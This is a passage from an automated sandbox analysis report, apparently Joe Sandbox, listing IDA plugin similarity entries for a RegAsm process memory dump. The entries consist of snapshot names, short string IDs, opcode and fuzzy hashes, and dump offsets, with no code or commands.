                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID: @
                                • API String ID: 0-2766056989
                                • Opcode ID: 8281e956446473216ed512d18dfae26456dfb93296f0f4edbd2d8efa18977056
                                • Instruction ID: c498aa6f9f71ab6537fc65730d2286dc4737ebff1f03574363b6386d85e3baf2
                                • Opcode Fuzzy Hash: 8281e956446473216ed512d18dfae26456dfb93296f0f4edbd2d8efa18977056
                                • Instruction Fuzzy Hash: 8051AD72504746AFD7229F24C894F6BB7E9FF84758F00092DBA8097690D7B5EE04CB92
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID: EXT-
                                • API String ID: 0-1948896318
                                • Opcode ID: 378d559ab40e021b8f41ec8ea368ecb0a23ed421fdaa69bfc33a69bd668bcc4b
                                • Instruction ID: 9328ddae7d71359ce98ef3b87fd5e1256a65066dad0c3cc7c0108c564b49dfdb
                                • Opcode Fuzzy Hash: 378d559ab40e021b8f41ec8ea368ecb0a23ed421fdaa69bfc33a69bd668bcc4b
                                • Instruction Fuzzy Hash: 1F41D2725083459BD722DA75C880B6BB7E9EFC8708F040D2DFA84E7140EB34DA08CB92
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID: PreferredUILanguages
                                • API String ID: 0-1884656846
                                • Opcode ID: 04bc134c71ff13dfc8c10fcb27a1410871ca3ccc7f1ded32856d3872c9647850
                                • Instruction ID: f76d1c6f16fa66c4db7c9a92abd0e4b7b3c55c3bcb15d90207c0cdf14233490e
                                • Opcode Fuzzy Hash: 04bc134c71ff13dfc8c10fcb27a1410871ca3ccc7f1ded32856d3872c9647850
                                • Instruction Fuzzy Hash: CC41D532D00219ABDF15DA95C840FFEB7B9EF84758F060166EA05A7250DB34DE40DBA0
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID: BinaryHash
                                • API String ID: 0-2202222882
                                • Opcode ID: 0b14dae1563a8105d021d9459a8f7769a5dd8badfc417cf46c6665b2204b856f
                                • Instruction ID: bc2c69b6fae961e675f1679eff698c01eac6e44a700d84ecbf7e272b6883bad3
                                • Opcode Fuzzy Hash: 0b14dae1563a8105d021d9459a8f7769a5dd8badfc417cf46c6665b2204b856f
                                • Instruction Fuzzy Hash: B04135B1D0056CAADF219B50CC88FDEB77DAF44718F0045D6AA08A7140DB709F899FA9
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID: verifier.dll
                                • API String ID: 0-3265496382
                                • Opcode ID: cbe108d2e8d407c9cc1b36ef807cb2bf12b3d29a86b076f38c4c0bc1262d2467
                                • Instruction ID: 7d7383f103e6d48c6030b2e317bb48304339b99f1288fe27239d3233a7f52e38
                                • Opcode Fuzzy Hash: cbe108d2e8d407c9cc1b36ef807cb2bf12b3d29a86b076f38c4c0bc1262d2467
                                • Instruction Fuzzy Hash: 9031A571B40202AFDB249F69A861B36B7E5EFC9718F948439E605DF381E7358D81C790
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID: kLsE
                                • API String ID: 0-3058123920
                                • Opcode ID: 3303b7309fe10bb60c1a266fd599a768e3764fbcec13276a65874062b00af525
                                • Instruction ID: 4245f5732e1b3ad591e79307f2c47a3be41030af0d4b6ef15d31d23cdde0780b
                                • Opcode Fuzzy Hash: 3303b7309fe10bb60c1a266fd599a768e3764fbcec13276a65874062b00af525
                                • Instruction Fuzzy Hash: 0341CB7198139067E720AB20EC447657B9CEB80B28F240A1CEC544B7C4CB708D9BDFD1
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID: Flst
                                • API String ID: 0-2374792617
                                • Opcode ID: 5a10f20d2c28954e46b6908a1091478a0622e272325c85503920287eb0fc3c56
                                • Instruction ID: 167f56ff02be1a8a3886f6007246d5f441b200374905a724ac8e03207e65793e
                                • Opcode Fuzzy Hash: 5a10f20d2c28954e46b6908a1091478a0622e272325c85503920287eb0fc3c56
                                • Instruction Fuzzy Hash: EC41D0B1605311DFC714CF29C184A16FBE4EF89794F1481AEE849CF241D731DA82CB96
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID: `
                                • API String ID: 0-4168407445
                                • Opcode ID: 796ee8064cf0c660c92cb37146b037cdc4fd8af5b88753759cd27eaf2debb0cd
                                • Instruction ID: 13d592a37b4a6c96d5fa9f96c8a441ed73ecf5d7a5f4561d31d746269c251fc7
                                • Opcode Fuzzy Hash: 796ee8064cf0c660c92cb37146b037cdc4fd8af5b88753759cd27eaf2debb0cd
                                • Instruction Fuzzy Hash: EF3139B25002109BCB21AF24CC41BB977B5EF80314F5485A9DC8A9B346DF74EE86DFA0
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID: Actx
                                • API String ID: 0-89312691
                                • Opcode ID: eb5ee5b9d316c979b06cb7b8e5ff622fabc697b7f892e2ab57fbbcfc04e6cb7d
                                • Instruction ID: 0f6822d718018124883b6b4b75f6a022df999f1ef64596d5729a2e926b939a02
                                • Opcode Fuzzy Hash: eb5ee5b9d316c979b06cb7b8e5ff622fabc697b7f892e2ab57fbbcfc04e6cb7d
                                • Instruction Fuzzy Hash: 411181313056328BEB2C491E8C507377295EBD53A8FB4812AE852CB390DF71D949C3C0
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 1dfd9673a743e21ff3a1280f7cbb3b884bc05cd3e03ee0fb7d9af3b3a23111d6
                                • Instruction ID: 4d96908db87e6bd5c63f00131dfae7ccbfb9e3d873c946829b54b54644ffbf79
                                • Opcode Fuzzy Hash: 1dfd9673a743e21ff3a1280f7cbb3b884bc05cd3e03ee0fb7d9af3b3a23111d6
                                • Instruction Fuzzy Hash: 04429E71A0061A8FDB19CF59C890ABEF7B2FF88314B18856DD452AB350DB34E946CF90
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: c508fcc68219a6428ad69ada81d01f13dae419515f8c9059be9e89d3992480e4
                                • Instruction ID: 08e9c603658d4414bc79291109fd285aa3ad764bdd2954d9ad5e66841caeea7e
                                • Opcode Fuzzy Hash: c508fcc68219a6428ad69ada81d01f13dae419515f8c9059be9e89d3992480e4
                                • Instruction Fuzzy Hash: 5B32AF71E00219DBCB14DFA9D894BBEBBB5FF94718F184129E805AB381EB359D11CB90
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: b9c35bdfdb754d6e33858239c0c2404386b88fd8e8679209dc85501d55b32395
                                • Instruction ID: abe6f7b2afdc81718da9f91eb16c57d2639727109410a7f6d95569b578beda56
                                • Opcode Fuzzy Hash: b9c35bdfdb754d6e33858239c0c2404386b88fd8e8679209dc85501d55b32395
                                • Instruction Fuzzy Hash: 0A22E3746046698FDB24CF2AC058772B7F1BF84308F28859ED886CF685D735D692DB60
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: d4bb53ad206f6ee060c627b16cab2dc89088f703c481e02b7b36ba1ae2c45345
                                • Instruction ID: b6a3d283bf4fb30fc3d9f5adebf5472cf5d701310a2b6a80b61ce3815ee1f212
                                • Opcode Fuzzy Hash: d4bb53ad206f6ee060c627b16cab2dc89088f703c481e02b7b36ba1ae2c45345
                                • Instruction Fuzzy Hash: 40228E75A002168FCF19CF59C490ABEB7B2FF89318B18456DD85ADB344DB70AE52CB90
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: ab2c98dc2012a80282a1727459e5e5c47ee3bc21463e2d1652943e70e983f3f9
                                • Instruction ID: fb62c7328b3d7afd8e05f0c8a092c969ab179884f00917369d23b055d67b126b
                                • Opcode Fuzzy Hash: ab2c98dc2012a80282a1727459e5e5c47ee3bc21463e2d1652943e70e983f3f9
                                • Instruction Fuzzy Hash: 7AD10671A046069BEB14DF25C892BBA73B6FF85318F044729F916DB280EB34DE45DB90
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a04945a97e95f403ab42888f7af6a2b8d9946cf9d7e7630247b99144e7c62cca
                                • Instruction ID: 6f2f911059e1d50390f2feb801c9e5b99e3aa15c9a374467f044bc3de0621494
                                • Opcode Fuzzy Hash: a04945a97e95f403ab42888f7af6a2b8d9946cf9d7e7630247b99144e7c62cca
                                • Instruction Fuzzy Hash: A0C19371E002169BDB28DF59C840BAEB7B6EF94718F14C269D915BB380DB74EA45CBC0
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: ab939db5dcb1c1ec417e7af79962bab08859259cc5b038c60b31a32ff5431a22
                                • Instruction ID: 0003a169ad016f1f2df74d20fd51dd7f7650182bf64816ba33d01566792a6af1
                                • Opcode Fuzzy Hash: ab939db5dcb1c1ec417e7af79962bab08859259cc5b038c60b31a32ff5431a22
                                • Instruction Fuzzy Hash: 02A19A71900615AFEB22EF64CC85FAF37BAAF85754F014054FA00AB2A0C779DD51DBA0
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: ec0cad5ca80d2b1747cd09cddcdcbe7268730f74ba9ae551f05d45f6fd086a89
                                • Instruction ID: c18ff5bbf30f488b9eead0932355cdf0f9ad855505d2ad5d3e4020f3daf209fc
                                • Opcode Fuzzy Hash: ec0cad5ca80d2b1747cd09cddcdcbe7268730f74ba9ae551f05d45f6fd086a89
                                • Instruction Fuzzy Hash: 4FC15C745083408FE764DF15C494BABB7E5FF88308F44896DE98987290DBB4EA09CF62
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: d0746220ad4b182850ea071a17164d6e128f6c1fb5647b23e775b61474a4cfee
                                • Instruction ID: d42d6dfb03ee1f054d49d04e954814ba5a0f9ad6f95ac0952848ee957d221883
                                • Opcode Fuzzy Hash: d0746220ad4b182850ea071a17164d6e128f6c1fb5647b23e775b61474a4cfee
                                • Instruction Fuzzy Hash: F9A1C170B01616DBDB24CF65C9D8BBAB7B1FF84314F04402DEA45A7681EB34E912DB90
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 453f372705229f1505282cb117efa890e155ce42aa45bbf3fb2f724f53d3db03
                                • Instruction ID: e80670e385211650f97aeac56d69dfc7e7004169be781f35d713a4e76913079b
                                • Opcode Fuzzy Hash: 453f372705229f1505282cb117efa890e155ce42aa45bbf3fb2f724f53d3db03
                                • Instruction Fuzzy Hash: 12915732A00615DBDB26EF59D444BBEB7A2EF88728F058865ED05DB380E734DE41CB91
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: c2e3ee3dd0116637c244d80da088e8335378737677afdd0ae33b27616825e049
                                • Instruction ID: 65933df9e22ac78c1be8247ed813675d2d964085240b6e39b7b5282555854f42
                                • Opcode Fuzzy Hash: c2e3ee3dd0116637c244d80da088e8335378737677afdd0ae33b27616825e049
                                • Instruction Fuzzy Hash: 61B102756093808FD365CF29C580A6ABBE1BB88304F184A6EF899D7352D771E945CB42
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 2f57846fa6853ce2eba42e0856427c3c37140fe7ac7bc1e87bfd5d4bd44f03bd
                                • Instruction ID: 65a4d183fb8b0fe3bcb1866b82d84d0eea795454f5c5e6e3c6e7be5988f282cd
                                • Opcode Fuzzy Hash: 2f57846fa6853ce2eba42e0856427c3c37140fe7ac7bc1e87bfd5d4bd44f03bd
                                • Instruction Fuzzy Hash: EF816E72E001558BDF15EF68C9807AEB7B2FB88318F15C16AEC16B7344DB359A44CB91
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: bd7e6ee653dedebcbd9de7214d9c66a35beba31dda7e41020aad6ff6745225e7
                                • Instruction ID: 417a1f275a83070af95c352dc519371af93c7eb2465948ac6a186bfe9dbbfae2
                                • Opcode Fuzzy Hash: bd7e6ee653dedebcbd9de7214d9c66a35beba31dda7e41020aad6ff6745225e7
                                • Instruction Fuzzy Hash: 28818E71A00619EFDB25CFA5C880BEEB7BAFF88344F104429E959A7210D730EE45CB64
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 11472f6f314399e996bb615fdd90353382ec6cc7585b58a376b173f845c2a42d
                                • Instruction ID: ad8596cd464db6475f70ce1cd3d9832ff975f27b40dcb211bfeb1937904c06cb
                                • Opcode Fuzzy Hash: 11472f6f314399e996bb615fdd90353382ec6cc7585b58a376b173f845c2a42d
                                • Instruction Fuzzy Hash: 9571E375D00269DBCB26DF59C4907BEBBB5FF89704F14861BE842AB750E7309A11CBA0
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 77fa4721ac17e59f6669f5d3bec4b13067d9720cca570bc3c9a46b6cc9e1fb01
                                • Instruction ID: b32ff35e843780670e114c7e01838a4cffbd11691bc651427ca411998d87b36d
                                • Opcode Fuzzy Hash: 77fa4721ac17e59f6669f5d3bec4b13067d9720cca570bc3c9a46b6cc9e1fb01
                                • Instruction Fuzzy Hash: 9071CE716046418FC712DF29C480B2AB7E6FF89714F0589AAEC99CB351DB34DD46CBA2
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 7549b94cf2df94eaacd4e6ddd524bc9ec07fb2934d745805f02d377968bc0799
                                • Instruction ID: 17bde8aecd57d7b50ab542c51321b143001a196e5d34e989332ccd37e1fb3ecb
                                • Opcode Fuzzy Hash: 7549b94cf2df94eaacd4e6ddd524bc9ec07fb2934d745805f02d377968bc0799
                                • Instruction Fuzzy Hash: 30710432240B01AFD733CF14C884FAAB7EAEF84764F244928E65A976A0D775E944DF50
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                • Instruction ID: 40e62f79bdcd275d0834272a061c6effa836ea99d0ca23105e048e5c8117895a
                                • Opcode Fuzzy Hash: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                • Instruction Fuzzy Hash: E1719A71E00609AFCB11DFA9C994BAEBBBAFF88344F104569E505E7250DB34EA41DF90
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: e660d0edb7bfcedd0a120f97d403814835df7d7e686055d950252937132078fd
                                • Instruction ID: f87f9dfcf3eb54627b4b6a5f8990e30b5b3c81e009aea9a489fa41be2e87140e
                                • Opcode Fuzzy Hash: e660d0edb7bfcedd0a120f97d403814835df7d7e686055d950252937132078fd
                                • Instruction Fuzzy Hash: 0D816D71A00245DFCB09CF99C480AAEB7F1FF88300F1981A9D85AEB345D774EA51CB90
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a717b7e1374e4ee1e90413b4b323fb8da0ee8cb0f662a393db7ecdfec50dc0b0
                                • Instruction ID: 4447a65b520a6e673d021ebd6739865e724bd298484a27c400603091e778e3c0
                                • Opcode Fuzzy Hash: a717b7e1374e4ee1e90413b4b323fb8da0ee8cb0f662a393db7ecdfec50dc0b0
                                • Instruction Fuzzy Hash: 7061E2B1600715AFDF15DF65C884BABBBA9FF88714F004619F86A87240DB34EA15CBD1
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 7b058bfe0e6b516033903885f126eb484837fda5e236640ef3d71013f3f7fb99
                                • Instruction ID: 30c3b56879d2e30e9492d254ea708fba851018a4469f889596ba136f76239738
                                • Opcode Fuzzy Hash: 7b058bfe0e6b516033903885f126eb484837fda5e236640ef3d71013f3f7fb99
                                • Instruction Fuzzy Hash: 6E617F75E00616AFCB19DF79C480AADFBB6BF88304F14856AD419A7340DB34AA49CFD0
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 0b735351e02bd91c31a953dac8fb13a23e03fd4b7119cc5219f0b6a6f8f8549c
                                • Instruction ID: 7083ced4888cfb301d5c1f40511cf7682ab4b2881cf964892ce9518879ca3f99
                                • Opcode Fuzzy Hash: 0b735351e02bd91c31a953dac8fb13a23e03fd4b7119cc5219f0b6a6f8f8549c
                                • Instruction Fuzzy Hash: DB6116716047828BDB11CF65C894B6AB7E1FFC0708F18486DE89B8B391DB75E906CB81
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: f45a4223c32f9bdfa8be3f2fdf1193b410393c6e715e431053420a5a9cea4736
                                • Instruction ID: aae1b4516f269ade540bd62920e9807aa6b574c2271c1d78c77fdf7c429a77c4
                                • Opcode Fuzzy Hash: f45a4223c32f9bdfa8be3f2fdf1193b410393c6e715e431053420a5a9cea4736
                                • Instruction Fuzzy Hash: 7041BB31640600EFCB269F16D992B26B7A6EF81768F11842AF90DDB350DB30DE11EF90
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 6b75f15c4bfde454396e6f55a8365aaaf250f782800c64c9bc69481f9d3dd8f9
                                • Instruction ID: e2a265a2fd50b20839cb6b129653b2bc5361c665460d74e74bbf86ce3a82c4b5
                                • Opcode Fuzzy Hash: 6b75f15c4bfde454396e6f55a8365aaaf250f782800c64c9bc69481f9d3dd8f9
                                • Instruction Fuzzy Hash: 78513375E00696AFC712CF68C8807A9B3B1FF45710F048AAAE845DB740E734EA91CBD1
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: f6589435dca8dd4fb026b5b65e116749a0bb795012cae516d0456a124ffb2c41
                                • Instruction ID: af44959dae293b3ba0bdd505cbceb7ba18ca979c244a06ce4a995655e46729ed
                                • Opcode Fuzzy Hash: f6589435dca8dd4fb026b5b65e116749a0bb795012cae516d0456a124ffb2c41
                                • Instruction Fuzzy Hash: AA510231A00625EFDB15EB65C984BADF7F1BF44319F148069E50A93290DBB49A4ADF80
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: e34a641792a2e79be6bf0067dfbea21fe876c0422c27924c31e583a14ba6783b
                                • Instruction ID: 65e1ecf71cfe4f6805ed33e96c631d164a0a28bcb4da1e5e47d4afa536dd1f56
                                • Opcode Fuzzy Hash: e34a641792a2e79be6bf0067dfbea21fe876c0422c27924c31e583a14ba6783b
                                • Instruction Fuzzy Hash: C9515C726083429FDB15CF69C880B5AB7EAFFC8354F04892DF99A97280D734E945CB52
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: f5febd75351dab67372ed6e70a565143976467f8c7a69e96328243af47b86666
                                • Instruction ID: 39db7e6a4de14001ec939c475043c458135b02afb6f8a447ec4643a46701cc5b
                                • Opcode Fuzzy Hash: f5febd75351dab67372ed6e70a565143976467f8c7a69e96328243af47b86666
                                • Instruction Fuzzy Hash: 7A51AE71A01224DFDF29DAA9C940BEFB3B5BB44398F445018D809E7281DBB4EE48CB94
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 4135f764757bfa287c79f08cbfd1f269006820b9f520e5ac96214bbb950a5f22
                                • Instruction ID: 0ab988741befdebd98311eba90eb26aa30c55d9cc7285a3752e6a01cb4d63d0b
                                • Opcode Fuzzy Hash: 4135f764757bfa287c79f08cbfd1f269006820b9f520e5ac96214bbb950a5f22
                                • Instruction Fuzzy Hash: 4D41D972D00229ABCB15EBA48884ABFB7BDAF44798F0141A6ED01E7640D734DE41DBE4
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 77697749570a021fb2cd2da83d024749394ce9b700f00d8b2d7b0c69c8e10398
                                • Instruction ID: bd37c0d159c7b99bd872b3323345f047626b4d4b25b3aba7107df435522c8afc
                                • Opcode Fuzzy Hash: 77697749570a021fb2cd2da83d024749394ce9b700f00d8b2d7b0c69c8e10398
                                • Instruction Fuzzy Hash: 8E418C369002299BCB14DF98C840AFDB7B5AF8C714F14816AEC19E7350D735DE81CBA8
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
